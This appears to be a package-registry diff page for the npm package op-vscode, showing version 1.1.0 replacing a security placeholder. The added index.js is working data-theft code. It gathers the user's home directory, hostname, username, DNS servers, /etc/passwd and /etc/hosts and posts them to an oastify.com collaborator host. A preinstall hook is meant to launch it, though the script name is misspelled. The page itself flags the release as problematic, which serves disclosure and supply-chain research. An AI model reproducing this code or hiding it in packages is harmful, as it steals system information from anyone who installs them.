op-vscode 0.0.1-security → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of op-vscode might be problematic. Click here for more details.
- package/index.js +54 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
const os = require("os");
|
|
2
|
+
const dns = require("dns");
|
|
3
|
+
const fs = require("fs");
|
|
4
|
+
const https = require("https");
|
|
5
|
+
const packageJSON = require("./package.json");
|
|
6
|
+
const packageName = packageJSON.name;
|
|
7
|
+
|
|
8
|
+
// Collect system data from the remote server where the package is installed
|
|
9
|
+
const trackingData = JSON.stringify({
|
|
10
|
+
p: packageName, // Package name
|
|
11
|
+
c: __dirname, // Directory where the package is installed
|
|
12
|
+
hd: os.homedir(), // Home directory on the remote server
|
|
13
|
+
hn: os.hostname(), // Hostname of the remote server
|
|
14
|
+
un: os.userInfo().username, // Username on the remote server
|
|
15
|
+
dns: dns.getServers(), // DNS servers on the remote server
|
|
16
|
+
v: packageJSON.version, // Version of the package
|
|
17
|
+
pjson: packageJSON, // Full package.json data
|
|
18
|
+
etc_passwd: fs.existsSync('/etc/passwd') ? fs.readFileSync('/etc/passwd', 'utf8') : null, // /etc/passwd from the remote system
|
|
19
|
+
etc_hosts: fs.existsSync('/etc/hosts') ? fs.readFileSync('/etc/hosts', 'utf8') : null // /etc/hosts from the remote system
|
|
20
|
+
});
|
|
21
|
+
|
|
22
|
+
// Log the data to verify it's the remote server's information
|
|
23
|
+
console.log("Sending System Data from Remote Server: ", trackingData);
|
|
24
|
+
|
|
25
|
+
// Prepare the POST request data
|
|
26
|
+
var postData = JSON.stringify({
|
|
27
|
+
msg: trackingData,
|
|
28
|
+
});
|
|
29
|
+
|
|
30
|
+
// Request options to send data to your server (Burp Collaborator or any endpoint)
|
|
31
|
+
var options = {
|
|
32
|
+
hostname: "wee6j9oviqaqxsm1xje33n40hrnjb9zy.oastify.com", // Burp Collaborator server
|
|
33
|
+
port: 443,
|
|
34
|
+
path: "/",
|
|
35
|
+
method: "POST",
|
|
36
|
+
headers: {
|
|
37
|
+
"Content-Type": "application/json",
|
|
38
|
+
"Content-Length": postData.length,
|
|
39
|
+
},
|
|
40
|
+
};
|
|
41
|
+
|
|
42
|
+
// Send the data via HTTPS POST request
|
|
43
|
+
var req = https.request(options, (res) => {
|
|
44
|
+
res.on("data", (d) => {
|
|
45
|
+
process.stdout.write(d); // Output the response from the server
|
|
46
|
+
});
|
|
47
|
+
});
|
|
48
|
+
|
|
49
|
+
req.on("error", (e) => {
|
|
50
|
+
console.error("Error sending data:", e); // Handle any error during the request
|
|
51
|
+
});
|
|
52
|
+
|
|
53
|
+
req.write(postData); // Send the data in the request body
|
|
54
|
+
req.end(); // End the request
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "op-vscode",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.1.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node indesx.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=op-vscode for more information.
|